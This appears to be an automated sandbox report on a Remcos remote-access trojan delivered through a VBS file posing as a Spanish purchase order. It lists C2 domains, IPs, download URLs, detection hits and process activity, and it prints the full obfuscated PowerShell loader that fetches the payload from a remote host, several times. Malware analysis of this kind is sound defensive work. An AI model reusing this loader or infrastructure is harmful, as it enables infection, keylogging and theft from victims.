                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49543 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49541 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49538 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49522 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49540 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49542 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49544 -> 185.236.203.101:50396
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: fumecexpsales1international.duckdns.org
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 185.236.203.101 ports 0,3,50396,5,6,9
                Uses dynamic DNS services
                Source: unknownDNS query: name: fumecexpsales1international.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.5:49428 -> 185.236.203.101:50396
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewIP Address: 200.6.118.162 200.6.118.162
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49401 -> 200.6.118.162:443
                Source: global trafficHTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /bin/Interplea.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bin/iNJULFUvfUQqzNBELgyUIZY67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: torresvmackenna.clCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: torresvmackenna.cl
                Source: global trafficDNS traffic detected: DNS query: fumecexpsales1international.duckdns.org
                Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.2063357887.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066149580.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D924000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.2046230842.000001FB2F914000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabB
                Source: wscript.exe, 00000000.00000002.2066149580.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063357887.000001FB2D8DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048652207.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047920438.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048402977.000001FB2D8D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065186329.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
                Source: wscript.exe, 00000000.00000003.2046141045.000001FB2D95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045915330.000001FB2D937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?97dbf7f69e
                Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CC96C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://torresvmackenna.cl
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB8C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2405265854.0000000005C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CB16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178361107.000001A2CC235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl
                Source: powershell.exe, 00000004.00000002.2178361107.000001A2CAF55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpP
                Source: powershell.exe, 00000006.00000002.2389944244.0000000004D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/Interplea.snpXR#l
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3318420057.0000000000CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49401
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49401 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_7108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');GerminJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E8A7264_2_00007FF848E8A726
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E8B8E24_2_00007FF848E8B8E2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ADE9186_2_04ADE918
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ADF1E86_2_04ADF1E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04ADE5D06_2_04ADE5D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_078DCDF06_2_078DCDF0
                Source: nOrden_de_Compra___0001245.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4378
                Source: unknownProcess created: Commandline size = 4378
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4378Jump to behavior
                Source: amsi32_7108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@11/10@4/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Trkfugl.ChrJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-T15VJD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hypfsfn3.qtz.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
